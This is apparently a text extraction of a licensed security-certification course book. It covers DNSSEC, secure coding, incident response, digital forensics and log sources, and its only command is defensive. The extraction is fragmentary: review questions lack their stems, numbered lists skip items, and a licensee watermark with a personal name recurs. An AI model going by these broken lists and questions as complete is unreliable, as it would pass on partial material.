The Key Signing Key for a particular domain is validated by the parent domain
or host ISP. The top-level domain trusts are validated by the Regional Internet
Registries and the DNS root servers are self-validated, using a type of M-of-N
control group key signing. This establishes a chain of trust from the root servers
down to any particular subdomain.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Application Protocol Security
3
Baselines
Answer the following questions:
1. What type of attack against HTTPS aims to force the server to negotiate
weak ciphers?
message?
4. True or false? DNSSEC depends on a chain of trust from the root servers
4.
down.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 11B
Cloud and Web Application Security
Concepts
5
Cloud and web application security include cloud hardening, which fortifies cloud
infrastructure and reduces its attack surface, and application security, which
ensures software is securely designed, developed, and deployed. Both practices
work together to establish a layered defense strategy, effectively protecting
against many different threats. Secure coding practices include input validation
techniques, incorporating the principle of least privilege, maintaining secure session
management, enforcing encryption, patching support, and many other capabilities.
Additionally, developers must design software that produces comprehensive,
structured, and meaningful logs while incorporating real-time alerting mechanisms.
These complementary practices support a safe and secure cloud and web
application environment.
Input Validation
Input validation is an essential protection technique used in software and
web development that addresses the issue of untrusted input. Untrusted input
describes how an attacker can provide specially crafted data to an application to
manipulate its behavior. Injection attacks exploit the input mechanisms applications
rely on to execute malicious commands and scripts to access sensitive data, control
the operation of the application, gain access to otherwise protected back-end
systems, and disrupt operations.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Secure Cookies
Cookies are small pieces of data stored on a computer by a web browser while
accessing a website. They maintain session states, remember user preferences,
and track user behavior and other settings. Cookies can be exploited if not properly
secured, leading to attacks such as session hijacking or cross-site scripting.
To implement secure cookies, developers must follow certain well-documented
principles, such as using the ‘Secure’ attribute for all cookies to ensure they are only
sent over HTTPS connections and protected from interception via eavesdropping,
using the ‘HttpOnly’ attribute to prevent client-side scripts from accessing cookies
and protect against cross-site scripting attacks, and using the ‘SameSite’ attribute
to limit when cookies are sent to mitigate cross-site request forgery attacks.
Additionally, cookies should have expiration time limits to restrict their usable life.
Secure cookie techniques are critical in mitigating several web-based application
attacks, particularly those focused on unauthorized access or manipulation of
session cookies. Developers can defend against attacks that target them by
employing specific attributes within cookies.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Code Signing
Code signing practices use digital signatures to verify the integrity and authenticity
of software code. Code signing serves a dual purpose: ensuring that software has
not been tampered with since signing and confirming the software publisher’s
identity.
When software is digitally signed, the signer uses a private key to encrypt a hash or
digest of the code—this encrypted hash and the signer’s identity form the digital
signature. Code signing requires using a certificate issued by a trusted certificate
authority (CA). The certificate contains information about the signer’s identity and
is critical for verifying the digital signature. If the certificate is valid and issued by
a trusted CA, the software publisher’s identity can be confidently verified. Code
signing helps analysts and administrators block untrusted software and also helps
protect software publishers by providing a mechanism to validate the authenticity
of their code. Overall, code signing helps build trust in the software distribution
process.
While code signing provides assurance about the origin of code and verifies code
integrity, it does not inherently assure the safety or security of the code itself.
Code signing certifies the source and integrity of the code, but it doesn’t evaluate
the quality or security of the code. The signed code could still contain bugs,
vulnerabilities, or malicious code inserted by the original author. Signing ensures
software is from the expected developer and in the state the developer intended.
While code signing adds trust and authenticity to software distribution, it should not
be relied upon to guarantee secure or bug-free code.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Application Protections
Data exposure is a fault that allows privileged information (such as a token,
password, or personal data) to be read without being subject to the appropriate
access controls. Applications must only transmit such data between authenticated
hosts, using cryptography to protect the session. When incorporating encryption in
code, it is important to use industry standard encryption libraries that are proven to
be strong, rather than internally developed ones.
Error Handling
A well-written application must be able to handle errors and exceptions gracefully.
This means that the application performs in a controlled way when something
unpredictable happens. An error or exception could be caused by invalid user input,
a loss of network connectivity, another server or process failing, and so on. Ideally,
the programmer will have written a structured exception handler (SEH) to dictate
what the application should then do. Each procedure can have multiple exception
handlers.
Some handlers will deal with anticipated errors and exceptions; there should also
be a catchall handler that will deal with the unexpected. The main goal must be
for the application not to fail in a way that allows the attacker to execute code or
perform some sort of injection attack. One infamous example of a poorly written
exception handler is the Apple GoTo bug (nakedsecurity.sophos.com/2014/02/24/
anatomy-of-a-goto-fail-apples-ssl-bug-explained-plus-an-unofficial-patch).
Another issue is that an application’s interpreter may default to a standard handler
and display default error messages when something goes wrong. These may reveal
platform information and the inner workings of code to an attacker. It is better for
an application to use custom error handlers so that the developer can choose the
amount of information shown when an error is caused.
Lesson 11: Enhance Application Security Capabilities | Topic 11B
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Technically, an error is a condition that the process cannot recover from, such as the
system running out of memory. An exception is a type of error that can be handled by
a block of code without the process crashing. Note that exceptions are still described as
generating error codes/messages, however.
Memory Management
Many arbitrary code attacks depend on the target application having faulty memory
management procedures. This allows the attacker to execute their own code in the
space marked out by the target application. There are known unsecure practices for
memory management that should be avoided and checks for processing untrusted
input, such as strings, to ensure that it cannot overwrite areas of memory.
Monitoring Capabilities
Secure coding practices focus primarily on preventing software vulnerabilities but
also stress enhancements to logging and monitoring capabilities. These features
support security analysts tasked with detecting potential threats and malicious
activity in software. Writing code with enhanced monitoring capabilities improves
the granularity and effectiveness of logging and alerting systems, which are crucial
system monitoring tools.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Software Sandboxing
Sandboxing is a security mechanism used in software development and operation
to isolate running processes from each other or prevent them from accessing the
system they are running on. A sandbox is a protection feature designed to control a
program so it runs with highly restrictive access. This containment strategy reduces
the potential impact of malicious or malfunctioning software, making it effective
for improving system security and stability and mitigating risks associated with
software.
A practical example of sandboxing is implemented in modern web browsers, like
Google Chrome, which separates each tab and extension into distinct processes. If
a website or browser extension in one browser tab attempts to run malicious code,
it is confined within that tab’s sandbox. This action prevents malicious code from
impacting the entire browser or underlying operating system. Similarly, if a tab
crashes, it doesn’t cause the whole browser to fail, improving reliability.
Operating systems also utilize sandboxing to isolate applications. For example, iOS
and Android use sandboxing to limit each application’s actions. An app in a sandbox
can access its own data and resources but cannot access other app data or any
nonessential system resources without explicit permission. This approach limits the
damage caused by poorly written or malicious apps.
Virtual machines (VMs) and containers like Docker offer another example of
sandboxing at a larger scale. Each VM or container can run in isolation, separated
from the host and each other. The others remain unaffected if one VM or container
experiences a security breach or system failure.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Joe Sandbox analysis of a malicious executable file. (Screenshot courtesy of Joe Security, LLC.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Cloud and Web Application Security
Concepts
6
attacks?
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Lesson 11
Summary
5
You should be able to configure secure protocols for local network access and
management, application services, and remote access and management.
• Deploy certificates to email servers to use with secure SMTP, POP3, and IMAP.
• Deploy certificates or host keys to file servers to use with FTPS or SFTP.
• Identify injection attacks (XSS, SQL, XML, LDAP) that exploit lack of input
validation.
• Replay and request forgery attacks that exploit lack of secure session
management mechanisms.
• Review and test code using static and dynamic analysis, paying particular
attention to input validation, output encoding, error handling, and data
exposure.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LESSON INTRODUCTION
From a day-to-day perspective, incident response means investigating the alerts
produced by monitoring systems and issues reported by users. This activity is
guided by policies and procedures and assisted by various technical controls.
Incident response is a critical security function, and will be a very large part of your
work as a security professional. You must be able to summarize the phases of
incident handling and utilize appropriate data sources to assist an investigation.
Where incident response emphasizes the swift eradication of malicious activity,
digital forensics requires patient capture, preservation, and analysis of evidence
using verifiable methods. You may be called on to assist with an investigation
into the details of a security incident and to identify threat actors. To assist these
investigations, you must be able to summarize the basic concepts of collecting
and processing forensic evidence that could be used in legal action or for strategic
counterintelligence.
In this lesson, you will do the following:
• Summarize incident response and digital forensics procedures.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 12A
Incident Response
2
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Incident response likely requires coordinated action and authorization from several
different departments or managers, which adds further levels of complexity.
The IR process is focused on cybersecurity incidents. There are also major incidents
that pose an existential threat to company-wide operations. These major incidents are
handled by disaster recovery processes. A cybersecurity incident might lead to a major
incident being declared, however.
Preparation
The preparation process establishes and updates the policies and procedures
for dealing with security breaches. This includes provisioning the personnel and
resources to implement those policies.
Cybersecurity Infrastructure
Cybersecurity infrastructure is hardware and software tools that facilitate incident
detection, digital forensics, and case management:
• Incident detection tools provide visibility into the environment by fully or
partially automating the collection and analysis of network traffic, system
state monitoring, and log data.
• Digital forensics tools facilitate acquiring and validating data from system
memory and file systems. This can be performed just to assist incident response
or to prosecute a threat actor.
• Case management tools provide a database for logging incident details and
coordinating response activities across a team of responders.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Some organizations may prefer to outsource some of the CIRT functions to third-
party agencies by retaining an incident response provider. External agents are able
to deal more effectively with insider threats.
Communication Plan
Incident response policies should establish clear lines of communication for
reporting incidents and notifying affected parties as the management of an incident
progresses. It is vital to have essential contact information readily available.
It is critical to prevent the unintentional release of information beyond the team
authorized to handle the incident. It is imperative that adversaries not be alerted to
containment and remediation measures to be taken against them. Status and event
details should be circulated on a need-to-know basis and only to trusted parties
identified on a call list.
The team requires an out-of-band communication method that cannot be
intercepted. Using corporate email runs the risk that the threat actor will be able
to intercept communications.
Stakeholder Management
It is not helpful to publicize an incident in the press or through social media outside
of planned communications. Ensure that parties with privileged information do not
release this information to untrusted parties, whether intentionally or inadvertently.
Consider obligations to report an incident. It may be necessary to inform affected
parties during or immediately after the incident so that they can perform their
own remediation. There could also be a requirement to report to regulators or law
enforcement.
Also, consider the marketing and PR impact of an incident. This can be highly
damaging, and the company must demonstrate to customers that security
systems have been improved.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Detection
Detection is the process of correlating events from network and system data
sources and determining whether they are indicators of an incident. There are
multiple channels by which indicators may be recorded:
• Matching events in log files, error messages, IDS alerts, firewall alerts, and other
data sources to a pattern of known threat behavior.
It is wise to provide an option for confidential reporting so that employees are not
afraid to report insider threats such as fraud or misconduct.
When a suspicious event is detected, it is critical that the appropriate person on
the CIRT be notified so that they can take charge of the situation and formulate the
appropriate response. This person is referred to as the first responder. Employees
at all levels of the organization must be trained to recognize and respond
appropriately to actual or suspected security incidents.
Managing alerts generated by host and network intrusion detection systems correlated in
the Security Onion Security Information and Event Management (SIEM) platform. A SIEM can
generate huge numbers of alerts that need to be manually assessed for priority and investigation.
(Screenshot courtesy of Security Onion securityonion.net.)
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Analysis
After the detection process reports one or more indicators, in the analysis process,
the first responder investigates the data to determine whether a genuine incident
has been identified and what level of priority it should be assigned. Conversely,
the report might be categorized as a false positive and dismissed. Classification of
a true positive incident event often relies on correlating multiple indicators. For a
complex or high-impact event, the analysis might be escalated to senior CIRT team
members.
When an incident is verified as a true positive, the next objective is to identify
the type of incident and the data or resources affected. This establishes incident
category and impact, and allows the assignment of a priority level.
Impact
Several factors affect the process of determining impact:
• Data integrity—the most important factor in prioritizing incidents will often be
the value of data that is at risk.
• Detection time—research has shown that more than half of data breaches
are not detected for weeks or months after the intrusion occurs, while in a
successful intrusion data is typically breached within minutes. Systems used to
search for intrusions must be thorough and the response to detection must be
fast.
Category
Incident categories and definitions ensure that all response team members and
other organizational personnel have a shared understanding of the meaning of
terms, concepts, and descriptions.
Effective incident analysis depends on threat intelligence. This research provides
insight into adversary tactics, techniques, and procedures (TTPs). Insights from
threat research can be used to develop specific tools and playbooks to deal with
event scenarios. A key tool for threat research is the framework used to describe
the stages of an attack. These stages are often referred to as a cyber kill chain,
following the influential white paper Intelligence-Driven Computer Network Defense
commissioned by Lockheed Martin (lockheedmartin.com/content/dam/lockheed-
martin/rms/documents/cyber/LM-White-Paper-Intel-Driven-Defense.pdf).
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Playbooks
The CIRT should develop profiles or scenarios of typical incidents, such as DDoS
attacks, virus/worm outbreaks, data exfiltration by an external adversary, data
modification by an internal adversary, and so on. This guides investigators in
determining priorities and remediation plans.
A playbook is a data-driven standard operating procedure (SOP) to assist analysts
in detecting and responding to specific cyber threat scenarios. The playbook
starts with a report from an alert dashboard. It then leads the analyst through the
analysis, containment, eradication, recovery, and lessons learned steps to take.
Containment
Following detection and analysis, the incident management database should
have a record of the event indicators, the nature of the incident, its impact, and
the investigator responsible for managing the case. The next phase of incident
management is to determine an appropriate response.
As incidents cover a wide range of different scenarios, technologies, motivations,
and degrees of seriousness, there is no standard approach to containment or
incident isolation. Some of the many complex issues facing the CIRT are the
following:
• What damage or theft has occurred already? How much more could be inflicted,
and in what sort of time frame (loss control)?
• What countermeasures are available? What are their costs and implications?
• What actions could alert the threat actor that the attack has been detected?
What evidence of the attack must be gathered and preserved?
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Isolation-Based Containment
Isolation involves removing an affected component from whatever larger
environment it is a part of. This can be everything from removing a server from
the network after it has been the target of a denial of service attack to placing an
application in a sandbox outside the host environments it usually runs on. Isolation
removes any interface between the affected system and the production network or
the Internet.
A simple option is to disconnect the host from the network by pulling the network
plug (creating an air gap) or disabling its switch port. This is the least stealthy option
and will reduce opportunities to analyze the attack or malware.
If a group of hosts is affected, you could use routing infrastructure to isolate one
or more infected virtual LANs (VLANs) in a sinkhole that is not reachable from the
rest of the network. Another possibility is to use firewalls or other security filters to
prevent infected hosts from communicating.
Finally, isolation could also refer to disabling a user account or application service.
Temporarily disabling users’ network accounts may prove helpful in containing
damage if an intruder is detected within the network. Without privileges to access
resources, an intruder will not be able to further damage or steal information from
the organization. Applications that you suspect may be the vector of an attack can
be much less effective to the attacker if the application is prevented from executing
on most hosts.
Segmentation-Based Containment
Segmentation-based containment is a means of achieving the isolation of a host
or group of hosts using network technologies and architecture. Segmentation uses
VLANs, routing/subnets, and firewall ACLs to prevent a host or group of hosts from
communicating outside the protected segment. As opposed to completely isolating
the hosts, you might configure the protected segment as a sinkhole or honeynet
and allow the attacker to continue to receive filtered (and possibly modified) output
to deceive them into thinking the attack is progressing successfully. This facilitates
analysis of the threat actor’s TTPs and, potentially, their identity. Attribution of the
attack to a particular group will allow an estimation of adversary capability.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
If reinstalling from baseline template configurations or images, make sure that there
is nothing in the baseline that allowed the incident to occur! If so, update the template
before rolling it out again.
attack. This could be the same attack or from some new attack that the attacker
could launch through information they have gained about the network.
If the organization is subjected to a targeted attack, be aware that one incident may be
very quickly followed by another.
3. Ensure that affected parties are notified and provided with the means to
3.
remediate their own systems. For example, if customers’ passwords are stolen,
they should be advised to change the credentials for any other accounts where
that password might have been used (not good practice, but most people do it).
Lessons Learned
The lessons learned process reviews severe security incidents to determine their
root cause, whether they were avoidable, and how to avoid them in the future.
Lessons learned activity starts with a meeting where staff review the incident
and responses. The meeting must include staff directly involved along with other
noninvolved incident handlers, who can provide objective, external perspectives. All
staff must contribute freely and openly to the discussion, so these meetings must avoid
pointing blame and instead focus on improving procedures. Leadership should manage
disciplinary concerns related to staff failing to follow established procedures separately.
Following the meeting, one or more analysts should compile a lessons learned
report (LLR) or after-action report (AAR).
The lessons learned process should invoke root cause analysis or the effort to
determine how the incident was able to occur. A lot of models have been developed
to structure root cause analysis. One is the “Five Whys” model. This starts with a
statement of the problem and then poses successive “Why” questions to drill down
to root causes. Examples include the following:
• Why was our patient safety database found on a dark website? Because a threat
actor was able to copy it to USB and walk out of the building with it.
• Why was a threat actor able to copy the database to USB at all, or do so without
generating an alert? Because they were able to disable the data loss prevention
system.
• Why were they able to disable the data loss prevention system? Because they
were trusted with privileges to do so.
• Why were they allocated these privileges? No one seems to know . . . all
administrator accounts were issued with them.
• Why didn’t the act of disabling the data loss prevention system generate an
alert? It was logged, but alerts for that category had been disabled for causing
too many false positives.
This identifies two root causes as improper permission assignments and improper
logging/alerting configuration. One issue with the “Five Whys” model is that it can
quickly branch into different directions of inquiry.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Why was the incident perpetrated? Discuss the motives of the adversary and the
data assets they might have targeted.
• When did the incident occur, when was it detected, and how long did it take to
contain and eradicate?
• Where did the incident occur (host systems and network segments affected)?
• How did the incident occur? What tactics, techniques, and procedures (TTPs)
were employed by the adversary? Were the TTPs known and documented in a
knowledge base such as ATT&CK, or were they unique?
• What security controls would have provided better mitigation or improved the
response?
Testing
The procedures and tools used for incident response are difficult to master and
execute effectively. Analysts should not be practicing them for the first time in the
high-pressure environment of an actual incident. Running test exercises helps staff
develop competencies and can help to identify deficiencies in the procedures and
tools. Testing on specific incident response scenarios can use three forms:
• Tabletop exercise—this is the least costly type of testing. The facilitator presents
a scenario, and the responders explain what action they would take to identify,
contain, and eradicate the threat. The training does not use computer systems.
The scenario data is presented as flash cards.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Training
The actions of staff immediately following the detection of an incident can have a
critical impact on successful outcomes. Effective training on incident detection and
reporting procedures equip staff with the knowledge they need to react swiftly and
effectively to security events. Incident response is also likely to require coordinated
efforts from several different departments or groups, so cross-departmental
training is essential. The lessons learned phase of incident response often reveals a
need for additional security awareness and compliance training for employees. This
type of training helps employees develop the knowledge to identify attacks in the
future.
Training should focus on more than just technical skills and knowledge. Security
incidents can be very stressful and quickly cause working relationships to crack.
Training can improve team building and communication skills, giving employees
greater resilience when adverse events occur.
Threat Hunting
Threat hunting utilizes insights gained from threat intelligence to proactively
discover whether there is evidence of TTPs already present within the network
or system. This contrasts with a reactive process that is only triggered when alert
conditions are reported through an incident management system. Threat hunting
can provide useful information to the incident response preparation process, such
as demonstrating the value of investments in security tools and showing the need
for improvements to detection and analysis processes.
A threat hunting project is likely to be led by senior security analysts, but some
general points to observe include the following:
• Advisories and bulletins that warn of new threat types—threat hunting is a labor-
intensive activity and so needs to be performed with clear goals and resources.
Threat hunting usually proceeds according to some hypothesis of possible
threat. Security bulletins and advisories from vendors and security researchers
about new TTPs and/or vulnerabilities may be the trigger for establishing a
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
threat hunt. For example, if threat intelligence reveals that Windows desktops in
many companies are being infected with a new type of malware that is not being
blocked by any current malware definitions, you might initiate a threat-hunting
plan to detect whether the malware is also infecting your systems.
The Hunt dashboards in Security Onion can help to determine whether a given alert affects a single
system only (as here), or whether it is more widespread across the network. (Screenshot courtesy of
Security Onion securityonion.net.)
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Incident Response
3
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 12B
Digital Forensics
6
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12B
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Legal hold refers to the fact that information that may be relevant to a court case
must be preserved. Information subject to legal hold might be defined by regulators
or industry best practice, or there may be a litigation notice from law enforcement
or lawyers pursuing a civil action. This means that computer systems may be taken
as evidence, with all the obvious disruption to a network that entails. A company
subject to legal hold will usually have to suspend any routine deletion/destruction
of electronic or paper records and logs.
Acquisition
Acquisition is the process of obtaining a forensically clean copy of data from a
device siezed as evidence. If the computer system or device is not owned by the
organization, there is the question of whether search or seizure is legally valid.
This impacts bring-your-own-device (BYOD) policies. For example, if an employee
is accused of fraud, you must verify that the employee’s equipment and data can
be legally seized and searched. Any mistake may make evidence gained from the
search inadmissible.
Data acquisition is also complicated by the fact that it is more difficult to capture
evidence from a digital crime scene than it is from a physical one. Some evidence
will be lost if the computer system is powered off; on the other hand, some
evidence may be unobtainable until the system is powered off. Additionally,
evidence may be lost depending on whether the system is shut down or “frozen” by
suddenly disconnecting the power.
Acquisition usually proceeds by using a tool to make an image from the data held
on the target device. An image can be acquired from either volatile or nonvolatile
storage. The general principle is to capture evidence in the order of volatility, from
more volatile to less volatile. The ISOC best practice guide to evidence collection
and archiving, published as tools.ietf.org/html/rfc3227, sets out the general order
as follows:
1. CPU registers and cache memory (including cache on disk controllers, graphics
cards, and so on).
3. Data on persistent mass storage devices (HDDs, SSDs, and flash memory
3.
devices):
• Partition and file system blocks, slack space, and free space.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12B
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
The Windows registry is mostly stored on disk, but there are keys—notably HKLM\
HARDWARE—that only ever exist in memory. The contents of the registry can be
analyzed via a memory dump.
Viewing the process list in a memory dump using the Volatility framework. (Screenshot Volatility
framework volatilityfoundation.org.)
A specialist hardware or software tool can capture the contents of memory while
the host is running. Unfortunately, this type of tool needs to be preinstalled as it
requires a kernel mode driver to dump any data of interest. Various commercial
tools are available to perform system memory acquistion on Windows. On Linux,
the Volatility framework includes a tool to install a kernel driver.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12B
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Static acquisition by shutting down the host—this runs the risk that the
malware will detect the shutdown process and perform anti-forensics to try to
remove traces of itself.
Given sufficient time at the scene, an investigator might decide to perform both a
live and static acquisition. Whichever method is used, it is imperative to document
the steps taken and supply a timeline and video-recorded evidence of actions taken
to acquire the evidence.
There are many GUI imaging utilities, including those packaged with forensic suites.
If no specialist tool is available, on a Linux host, the dd command makes a copy of
an input file (if=) to an output file (of=). In the following, sda is the fixed drive:
dd if=/dev/sda of=/mnt/usbstick/backup.img
A more recent fork of dd is dcfldd, which provides additional features like multiple
output files and exact match verification.
Using dcfldd (a version of dd with additional forensics functionality created by the DoD) and
generating a hash of the source-disk data (sda).
Preservation
It is vital that the evidence collected at the crime scene conform to a valid timeline.
Digital information is susceptible to tampering, so access to the evidence must
be tightly controlled. Video recording the whole process of evidence acquisition
establishes the provenance of the evidence as deriving directly from the crime
scene.
To obtain a forensically sound image from nonvolatile storage, the capture tool
must not alter data or metadata (properties) on the source disk or file system. Data
acquisition would normally proceed by attaching the target device to a forensics
workstation or field capture device equipped with a write blocker. A write blocker
prevents any data on the disk or volume from being changed by filtering write
commands at the driver and OS level.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12B
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
3. A second hash is then made of the image, which should match the original
hash of the media.
Chain of Custody
The host devices and media taken from the crime scene should be labeled, bagged,
and sealed, using tamper-evident bags. It is also appropriate to ensure that the
bags have antistatic shielding to reduce the possibility that data will be damaged
or corrupted on the electronic media by electrostatic discharge (ESD). Each piece
of evidence should be documented by a chain of custody form. Chain of custody
documentation records where, when, and who collected the evidence, who
subsequently handled it, and where it was stored. This establishes the integrity
and proper handling of evidence. When security breaches go to trial, the chain of
custody protects an organization against accusations that evidence has either been
tampered with or is different than it was when it was collected. Every person in the
chain who handles evidence must log the methods and tools they used.
The evidence should be stored in a secure facility; this not only means access
control, but also environmental control, so that the electronic systems are not
damaged by condensation, ESD, fire, and other hazards.
Reporting
Digital forensics reporting summarizes the significant contents of the digital data
and the conclusions from the investigator’s analysis. It is important to note that
strong ethical principles must guide forensics analysis:
• Analysis must be performed without bias. Conclusions and opinions should be
formed only from the direct evidence under analysis.
• Analysis methods must be repeatable by third parties with access to the same
evidence.
Defense counsel may try to use any deviation of good ethical and professional
behavior to have the forensics investigator’s findings dismissed.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12B
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12B
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Digital Forensics
7
2. You’ve fulfilled your role in the forensic process, and now you plan on
handing the evidence over to an analysis team. What important process
should you observe during this transition, and why?
3. True or false? To ensure evidence integrity, you must make a hash of the
media before making an image.
4. You must recover the contents of the ARP cache as vital evidence of an
on-path attack. Should you shut down the PC and image the hard drive
to preserve it?
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12B
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 12C
Data Sources
5
Networks, hosts, and applications produce a very large amount of data via different
mechanisms. Identifying all these data sources and then scanning them for threat
indicators is a significant challenge for all types of organizations. As a security
professional, you must be able to identify and utilize appropriate data sources to
perform incident response as efficiently as possible.
• Log files generated by the OS components of client and server host computers.
• Log files and alerts generated by endpoint security software installed on hosts.
This can include host-based intrusion detection, vulnerability scanning, antivirus,
and firewall security software.
The sheer diversity and size of data sources is a significant problem for
investigations. Organizations use security information and event management
(SIEM) tools to aggregate and correlate multiple data sources. This can be used as a
single source for agent dashboards and automated reports.
Issues posed by dealing with large amounts of data are often described as the "V's."
They include volume, velocity, variety, veracity, and value.
Dashboards
An event dashboard provides a console to work from for day-to-day incident
response. It provides a summary of information drawn from the underlying
data sources to support some work task. Separate dashboards can be created
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12C
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Automated Reports
A SIEM can be used for two types of reporting:
• Alerts and alarms detect the presence of threat indicators in the data and can be
used to start incident cases. Day-to-day management of alert reporting forms a
large part of an analyst’s workload.
A SIEM will ship with a number of preconfigured dashboards and reports, but it will also
make tools available for creating custom reports. It is critical to tailor the information
presented in a dashboard or report to meet the needs and goals of its intended
audience. If the report simply contains an overwhelming amount of information or
irrelevant information, it will not be possible to quickly identify remediation actions.
Log Data
Log data is a critical resource for investigating security incidents. As well as the log
format, you must also consider the range of sources for log files, and know how to
determine what type of log file will best support any given investigation scenario.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12C
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Event metadata is the source and time of the event. The source might include a
host or network address, a process name, and categorization/priority fields.
Accurate logging requires each host to be synchronized to the same date and time value
and format. Ideally, each host should also be configured to use the same time zone, or
to use a "neutral" zone, such as universal coordinated time (UTC).
Windows hosts and applications can use Event Viewer format logging. Each event
has a header reporting the source, level, user, timestamp, category, keywords, and
host name.
Syslog provides an open format, protocol, and server software for logging event
messages. It is used by a very wide range of host types. For example, syslog
messages can be generated by switches, routers, and firewalls, as well as UNIX or
Linux servers and workstations.
A syslog message comprises a PRI code, a header, and a message part:
• The PRI code is calculated from the facility and a severity level.
• The header contains a timestamp, host name, app name, process ID, and
message ID fields.
• The message part contains a tag showing the source process plus content. The
format of the content is application dependent. It might use space- or comma-
delimited fields or name/value pairs.
Log data can be kept and analyzed on each host individually, but most organizations
require better visibility into data sources and host monitoring. SIEM software can
offer a “single pane of glass” view of all network hosts and appliances by collecting
and aggregating logs from multiple sources. Logs can be collected via an agent
running on each host, or by using syslog (or similar) to forward event data.
• File system events record whether use of permissions to read or modify a file
was allowed or denied. As this would generate a huge amount of data if enabled
for all file system objects by default, file system auditing usually needs to be
explicitly configured.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12C
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Windows Logs
The three main Windows event log files are the following:
• Application—events generated by application processes, such as when there is a
crash, or when an app is installed or removed.
Linux Logs
Linux logging can be implemented differently for each distribution. Some
distibutions use syslog to direct messages relating to a particular subsystem to
a flat text file. Other distributions use Journald as a unified logging system with
a binary, rather than plaintext, file format. Journald messages are read using the
journalctl command, but it can be configured to export some messages to
text files via syslog.
Some of the principal log files are as follows:
• /var/log/messages or /var/log/syslog stores all events generated
by the system. Some of these are copied to individual log files.
• The package manager log (apt, yum, or dnf, depending on the distro) stores
information about what software has been installed and updated.
Linux authentication log showing SSH remote access is enabled, failed authentication attempts for
root user, and successful login for lamp user.
macOS Logs
macOS uses a unified logging system, which can be accessed via the graphical
Console app, or the log command. The log command can be used with filters to
review security-related events, such as login (com.apple.login), app installs (com.
apple.install), and system policy violations (com.apple.syspolicy.exec).
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12C
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Application Logs
An application log file is simply one that is managed by an application rather than
the OS. The application may use Event Viewer or syslog to write event data using
a standard format, or it might write log files to its own application directories in
whatever format the developer has selected.
In Windows Event Viewer, there is a specific application log, which can be written to by
any authenticated account. There are also separate custom application and service logs,
which are managed by specific processes. The app developer chooses which log to use,
or whether to implement a logging system without using Event Viewer. Check the product
documentation to find out where events for a particular software app are logged.
Endpoint Logs
